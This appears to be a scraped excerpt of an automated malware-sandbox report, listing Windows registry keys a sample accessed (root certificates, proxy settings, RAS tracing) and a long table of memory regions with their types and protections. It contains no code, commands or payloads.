HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\331BA
|
331BA
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 78 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2561000
|
trusted library allocation
|
page read and write
|
||
270D000
|
trusted library allocation
|
page read and write
|
||
250D000
|
trusted library allocation
|
page read and write
|
||
2361000
|
trusted library allocation
|
page read and write
|
||
416000
|
system
|
page execute and read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
25F1000
|
trusted library allocation
|
page read and write
|
||
1236F000
|
trusted library allocation
|
page read and write
|
||
1C2E7000
|
heap
|
page read and write
|
||
455B000
|
heap
|
page read and write
|
||
409C000
|
heap
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
1C2F2000
|
heap
|
page read and write
|
||
3667000
|
heap
|
page read and write
|
||
7FE8B2F0000
|
trusted library allocation
|
page execute and read and write
|
||
2499000
|
trusted library allocation
|
page read and write
|
||
7FE89BFD000
|
trusted library allocation
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
481000
|
heap
|
page read and write
|
||
258000
|
heap
|
page read and write
|
||
3C0000
|
direct allocation
|
page read and write
|
||
2B46000
|
trusted library allocation
|
page read and write
|
||
43A2000
|
heap
|
page read and write
|
||
3128000
|
heap
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
403000
|
system
|
page execute and read and write
|
||
4F86000
|
heap
|
page read and write
|
||
408000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
7FE898DC000
|
trusted library allocation
|
page execute and read and write
|
||
468000
|
heap
|
page read and write
|
||
26AE000
|
trusted library allocation
|
page read and write
|
||
30DB000
|
trusted library allocation
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
1A3DA000
|
stack
|
page read and write
|
||
4331000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3AF7000
|
heap
|
page read and write
|
||
4039000
|
heap
|
page read and write
|
||
574C000
|
heap
|
page read and write
|
||
409D000
|
heap
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
360C000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
1C18E000
|
stack
|
page read and write
|
||
1F26000
|
heap
|
page read and write
|
||
2B52000
|
trusted library allocation
|
page read and write
|
||
439E000
|
heap
|
page read and write
|
||
342F000
|
trusted library allocation
|
page read and write
|
||
2623000
|
trusted library allocation
|
page read and write
|
||
40B2000
|
heap
|
page read and write
|
||
130000
|
direct allocation
|
page read and write
|
||
2700000
|
remote allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
248D000
|
trusted library allocation
|
page read and write
|
||
378E000
|
heap
|
page read and write
|
||
420D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
40D000
|
heap
|
page read and write
|
||
52BE000
|
stack
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
2ED0000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
2EAD000
|
direct allocation
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
7FE89C18000
|
trusted library allocation
|
page read and write
|
||
364000
|
heap
|
page read and write
|
||
5839000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1C303000
|
heap
|
page read and write
|
||
1B00C000
|
stack
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
375C000
|
heap
|
page read and write
|
||
30D3000
|
heap
|
page read and write
|
||
23F9000
|
trusted library allocation
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
7FE8989B000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3F57000
|
direct allocation
|
page read and write
|
||
3F60000
|
direct allocation
|
page read and write
|
||
2775000
|
trusted library allocation
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
4331000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
2930000
|
trusted library allocation
|
page execute
|
||
3E50000
|
direct allocation
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
3129000
|
heap
|
page read and write
|
||
3E60000
|
direct allocation
|
page read and write
|
||
43FF000
|
heap
|
page read and write
|
||
35A7000
|
heap
|
page read and write
|
||
7FE89A33000
|
trusted library allocation
|
page read and write
|
||
5821000
|
heap
|
page read and write
|
||
239F000
|
stack
|
page read and write
|
||
3E50000
|
direct allocation
|
page read and write
|
||
493D000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
44E0000
|
trusted library allocation
|
page read and write
|
||
30CF000
|
heap
|
page read and write
|
||
7FE8B430000
|
trusted library allocation
|
page read and write
|
||
2361000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
7FE8988D000
|
trusted library allocation
|
page execute and read and write
|
||
418000
|
heap
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
1CB0000
|
trusted library allocation
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
40C000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
966000
|
heap
|
page read and write
|
||
2634000
|
trusted library allocation
|
page read and write
|
||
5EEF000
|
stack
|
page read and write
|
||
57E6000
|
heap
|
page read and write
|
||
1C2E0000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
1A5BF000
|
stack
|
page read and write
|
||
26B6000
|
trusted library allocation
|
page read and write
|
||
12371000
|
trusted library allocation
|
page read and write
|
||
52E000
|
heap
|
page read and write
|
||
433F000
|
heap
|
page read and write
|
||
4484000
|
heap
|
page read and write
|
||
415000
|
system
|
page execute and read and write
|
||
448F000
|
heap
|
page read and write
|
||
1AC63000
|
heap
|
page read and write
|
||
1B550000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1C1B0000
|
heap
|
page read and write
|
||
1C7000
|
heap
|
page read and write
|
||
3598000
|
heap
|
page read and write
|
||
3E60000
|
direct allocation
|
page read and write
|
||
3AEF000
|
heap
|
page read and write
|
||
375C000
|
heap
|
page read and write
|
||
31D0000
|
trusted library allocation
|
page read and write
|
||
2B6E000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3BF1000
|
direct allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
1A5C0000
|
heap
|
page read and write
|
||
5FEE000
|
stack
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
587F000
|
heap
|
page read and write
|
||
4399000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
7FE8B390000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
1AD9F000
|
stack
|
page read and write
|
||
450000
|
trusted library allocation
|
page read and write
|
||
440000
|
trusted library allocation
|
page execute and read and write
|
||
39B0000
|
heap
|
page read and write
|
||
18D000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
2A7000
|
trusted library allocation
|
page execute and read and write
|
||
361D000
|
heap
|
page read and write
|
||
2B7D000
|
trusted library allocation
|
page read and write
|
||
39B000
|
heap
|
page read and write
|
||
1A69F000
|
heap
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
3419000
|
trusted library allocation
|
page read and write
|
||
30D4000
|
heap
|
page read and write
|
||
5B02000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
7FE89882000
|
trusted library allocation
|
page read and write
|
||
7FE8B3F0000
|
trusted library allocation
|
page read and write
|
||
2EB0000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
485000
|
heap
|
page read and write
|
||
439D000
|
heap
|
page read and write
|
||
312F000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
382D000
|
heap
|
page read and write
|
||
27A3000
|
trusted library allocation
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
30E8000
|
heap
|
page read and write
|
||
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
490B000
|
heap
|
page read and write
|
||
2B7E000
|
trusted library allocation
|
page read and write
|
||
3589000
|
trusted library allocation
|
page read and write
|
||
256E000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
1AC04000
|
heap
|
page read and write
|
||
4488000
|
heap
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
2B4F000
|
trusted library allocation
|
page read and write
|
||
473000
|
heap
|
page read and write
|
||
404E000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
4549000
|
heap
|
page read and write
|
||
5729000
|
heap
|
page read and write
|
||
378E000
|
heap
|
page read and write
|
||
404B000
|
heap
|
page read and write
|
||
1FE000
|
heap
|
page read and write
|
||
1C306000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3C60000
|
direct allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
448B000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
7FE89A62000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
1A51A000
|
stack
|
page read and write
|
||
3091000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
4770000
|
heap
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
4DD0000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
3BF1000
|
direct allocation
|
page read and write
|
||
139000
|
heap
|
page read and write
|
||
3F40000
|
direct allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
40C3000
|
trusted library allocation
|
page read and write
|
||
414000
|
heap
|
page read and write
|
||
3F57000
|
direct allocation
|
page read and write
|
||
3F40000
|
direct allocation
|
page read and write
|
||
1C240000
|
heap
|
page read and write
|
||
56FA000
|
heap
|
page read and write
|
||
44D6000
|
heap
|
page read and write
|
||
7FE89A3C000
|
trusted library allocation
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
447B000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
6D2000
|
heap
|
page read and write
|
||
2448000
|
trusted library allocation
|
page read and write
|
||
40A6000
|
heap
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
3BF7000
|
direct allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
2130000
|
heap
|
page execute and read and write
|
||
366000
|
heap
|
page read and write
|
||
7FE8B2D7000
|
trusted library allocation
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
242000
|
stack
|
page read and write
|
||
4934000
|
heap
|
page read and write
|
||
3A0000
|
direct allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
289000
|
heap
|
page read and write
|
||
491A000
|
heap
|
page read and write
|
||
3F57000
|
direct allocation
|
page read and write
|
||
1B3E0000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
300000
|
heap
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
382E000
|
heap
|
page read and write
|
||
4371000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
5850000
|
heap
|
page read and write
|
||
2DD0000
|
direct allocation
|
page read and write
|
||
4399000
|
heap
|
page read and write
|
||
281B000
|
stack
|
page read and write
|
||
4543000
|
heap
|
page read and write
|
||
7FE8993C000
|
trusted library allocation
|
page execute and read and write
|
||
4701000
|
heap
|
page read and write
|
||
495B000
|
heap
|
page read and write
|
||
3A7F000
|
stack
|
page read and write
|
||
1B19B000
|
stack
|
page read and write
|
||
3F54000
|
direct allocation
|
page read and write
|
||
27A9000
|
trusted library allocation
|
page read and write
|
||
3091000
|
heap
|
page read and write
|
||
6DF000
|
heap
|
page read and write
|
||
D0000
|
heap
|
page read and write
|
||
27A7000
|
trusted library allocation
|
page read and write
|
||
41C0000
|
heap
|
page read and write
|
||
DFE000
|
stack
|
page read and write
|
||
4401000
|
heap
|
page read and write
|
||
4E7000
|
heap
|
page read and write
|
||
2A2000
|
trusted library allocation
|
page read and write
|
||
170000
|
heap
|
page read and write
|
||
579F000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
3BA0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
61B000
|
heap
|
page read and write
|
||
D20000
|
heap
|
page read and write
|
||
4946000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
57CE000
|
heap
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
7FE8B133000
|
trusted library allocation
|
page read and write
|
||
7FE8B206000
|
trusted library allocation
|
page execute and read and write
|
||
53F000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
5735000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
507E000
|
stack
|
page read and write
|
||
403F000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1E90000
|
heap
|
page read and write
|
||
2654000
|
trusted library allocation
|
page read and write
|
||
124D4000
|
trusted library allocation
|
page read and write
|
||
4915000
|
heap
|
page read and write
|
||
359F000
|
heap
|
page read and write
|
||
3C00000
|
direct allocation
|
page read and write
|
||
2689000
|
trusted library allocation
|
page read and write
|
||
4347000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
426000
|
heap
|
page read and write
|
||
5AEE000
|
stack
|
page read and write
|
||
1DD0000
|
direct allocation
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
E6F000
|
stack
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
27AB000
|
trusted library allocation
|
page read and write
|
||
131000
|
heap
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
4038000
|
heap
|
page read and write
|
||
4FA000
|
heap
|
page read and write
|
||
42E6000
|
heap
|
page read and write
|
||
28D000
|
trusted library allocation
|
page execute and read and write
|
||
39B0000
|
heap
|
page read and write
|
||
43A6000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
404B000
|
heap
|
page read and write
|
||
7FE89A64000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
4946000
|
heap
|
page read and write
|
||
3F54000
|
direct allocation
|
page read and write
|
||
2080000
|
trusted library allocation
|
page execute read
|
||
361D000
|
heap
|
page read and write
|
||
2240000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
430E000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
1C05F000
|
stack
|
page read and write
|
||
1A49F000
|
stack
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
409A000
|
heap
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
367A000
|
trusted library allocation
|
page read and write
|
||
494000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
18D000
|
heap
|
page read and write
|
||
2E50000
|
heap
|
page read and write
|
||
4399000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
411C000
|
heap
|
page read and write
|
||
2B6F000
|
trusted library allocation
|
page read and write
|
||
2DD0000
|
direct allocation
|
page read and write
|
||
4210000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
53CF000
|
heap
|
page read and write
|
||
4209000
|
heap
|
page read and write
|
||
3745000
|
heap
|
page read and write
|
||
44D000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3B5C000
|
heap
|
page read and write
|
||
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
1B8000
|
stack
|
page read and write
|
||
787000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
349000
|
heap
|
page read and write
|
||
4DE000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
412000
|
heap
|
page read and write
|
||
374D000
|
heap
|
page read and write
|
||
7FE89893000
|
trusted library allocation
|
page read and write
|
||
51B000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
4E3000
|
heap
|
page read and write
|
||
455A000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2D30000
|
trusted library allocation
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
1AD0000
|
heap
|
page read and write
|
||
49DD000
|
stack
|
page read and write
|
||
7FE89936000
|
trusted library allocation
|
page read and write
|
||
16C000
|
heap
|
page read and write
|
||
1C46000
|
heap
|
page read and write
|
||
5815000
|
heap
|
page read and write
|
||
439C000
|
heap
|
page read and write
|
||
4E39000
|
heap
|
page read and write
|
||
247000
|
heap
|
page read and write
|
||
448B000
|
heap
|
page read and write
|
||
1C222000
|
heap
|
page read and write
|
||
47A000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
2B65000
|
trusted library allocation
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
4B6000
|
heap
|
page read and write
|
||
1C50F000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
1C4BE000
|
stack
|
page read and write
|
||
4201000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3E7000
|
heap
|
page read and write
|
||
449C000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
40AB000
|
heap
|
page read and write
|
||
4901000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
23F0000
|
trusted library allocation
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
1BF0000
|
trusted library allocation
|
page read and write
|
||
40A9000
|
heap
|
page read and write
|
||
405F000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
8B000
|
stack
|
page read and write
|
||
317E000
|
trusted library allocation
|
page read and write
|
||
448F000
|
heap
|
page read and write
|
||
39F000
|
heap
|
page read and write
|
||
27D000
|
trusted library allocation
|
page execute and read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
383000
|
direct allocation
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3E50000
|
heap
|
page read and write
|
||
3900000
|
direct allocation
|
page read and write
|
||
173000
|
trusted library allocation
|
page execute and read and write
|
||
2EAA000
|
direct allocation
|
page read and write
|
||
3BF7000
|
direct allocation
|
page read and write
|
||
382F000
|
heap
|
page read and write
|
||
121000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
1C83D000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
405C000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
7FE89B9D000
|
trusted library allocation
|
page read and write
|
||
45C6000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
27AD000
|
trusted library allocation
|
page read and write
|
||
2D11000
|
trusted library allocation
|
page read and write
|
||
47B000
|
heap
|
page read and write
|
||
4054000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
548000
|
heap
|
page read and write
|
||
515F000
|
stack
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
409C000
|
heap
|
page read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
492000
|
heap
|
page read and write
|
||
7FE8B1D0000
|
trusted library allocation
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
57B7000
|
heap
|
page read and write
|
||
4779000
|
heap
|
page read and write
|
||
360C000
|
heap
|
page read and write
|
||
1BE000
|
heap
|
page read and write
|
||
39F000
|
direct allocation
|
page read and write
|
||
30B6000
|
heap
|
page read and write
|
||
43AB000
|
heap
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
1C213000
|
heap
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
27C8000
|
trusted library allocation
|
page read and write
|
||
3145000
|
heap
|
page read and write
|
||
3280000
|
heap
|
page read and write
|
||
317A000
|
trusted library allocation
|
page read and write
|
||
3BB5000
|
trusted library allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3B6E000
|
heap
|
page read and write
|
||
39B0000
|
heap
|
page read and write
|
||
2A5000
|
trusted library allocation
|
page execute and read and write
|
||
2E80000
|
heap
|
page read and write
|
||
24C0000
|
heap
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
3C00000
|
direct allocation
|
page read and write
|
||
1B034000
|
heap
|
page read and write
|
||
424000
|
heap
|
page read and write
|
||
2B75000
|
trusted library allocation
|
page read and write
|
||
312B000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
353D000
|
trusted library allocation
|
page read and write
|
||
3804000
|
heap
|
page read and write
|
||
27DF000
|
trusted library allocation
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
7FE89966000
|
trusted library allocation
|
page execute and read and write
|
||
2B7B000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
7FE8B328000
|
trusted library allocation
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
216000
|
heap
|
page read and write
|
||
418000
|
heap
|
page read and write
|
||
7FE8B420000
|
trusted library allocation
|
page read and write
|
||
7FE8B12D000
|
trusted library allocation
|
page execute and read and write
|
||
3AE8000
|
heap
|
page read and write
|
||
1C9CF000
|
stack
|
page read and write
|
||
39DD000
|
direct allocation
|
page read and write
|
||
27C000
|
stack
|
page read and write
|
||
56B3000
|
heap
|
page read and write
|
||
2560000
|
heap
|
page read and write
|
||
2E0000
|
trusted library allocation
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
4915000
|
heap
|
page read and write
|
||
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
24B6000
|
trusted library allocation
|
page read and write
|
||
476A000
|
heap
|
page read and write
|
||
2481000
|
trusted library allocation
|
page read and write
|
||
261F000
|
trusted library allocation
|
page read and write
|
||
3AF0000
|
heap
|
page read and write
|
||
697000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
58BA000
|
heap
|
page read and write
|
||
4775000
|
heap
|
page read and write
|
||
1C890000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
27B2000
|
trusted library allocation
|
page read and write
|
||
420C000
|
heap
|
page read and write
|
||
361D000
|
heap
|
page read and write
|
||
750000
|
heap
|
page execute and read and write
|
||
3FC0000
|
direct allocation
|
page read and write
|
||
249E000
|
stack
|
page read and write
|
||
2B54000
|
trusted library allocation
|
page read and write
|
||
53C0000
|
heap
|
page read and write
|
||
427000
|
heap
|
page read and write
|
||
46C000
|
heap
|
page read and write
|
||
4062000
|
heap
|
page read and write
|
||
1C1AF000
|
stack
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
3900000
|
direct allocation
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
3B6D000
|
heap
|
page read and write
|
||
7FE8B123000
|
trusted library allocation
|
page execute and read and write
|
||
39B0000
|
heap
|
page read and write
|
||
3750000
|
heap
|
page read and write
|
||
2130000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
3129000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
485000
|
heap
|
page read and write
|
||
455A000
|
heap
|
page read and write
|
||
4549000
|
heap
|
page read and write
|
||
7FE8B17C000
|
trusted library allocation
|
page execute and read and write
|
||
353A000
|
trusted library allocation
|
page read and write
|
||
239E000
|
stack
|
page read and write | page guard
|
||
361E000
|
heap
|
page read and write
|
||
3BF4000
|
direct allocation
|
page read and write
|
||
513000
|
trusted library allocation
|
page read and write
|
||
353A000
|
trusted library allocation
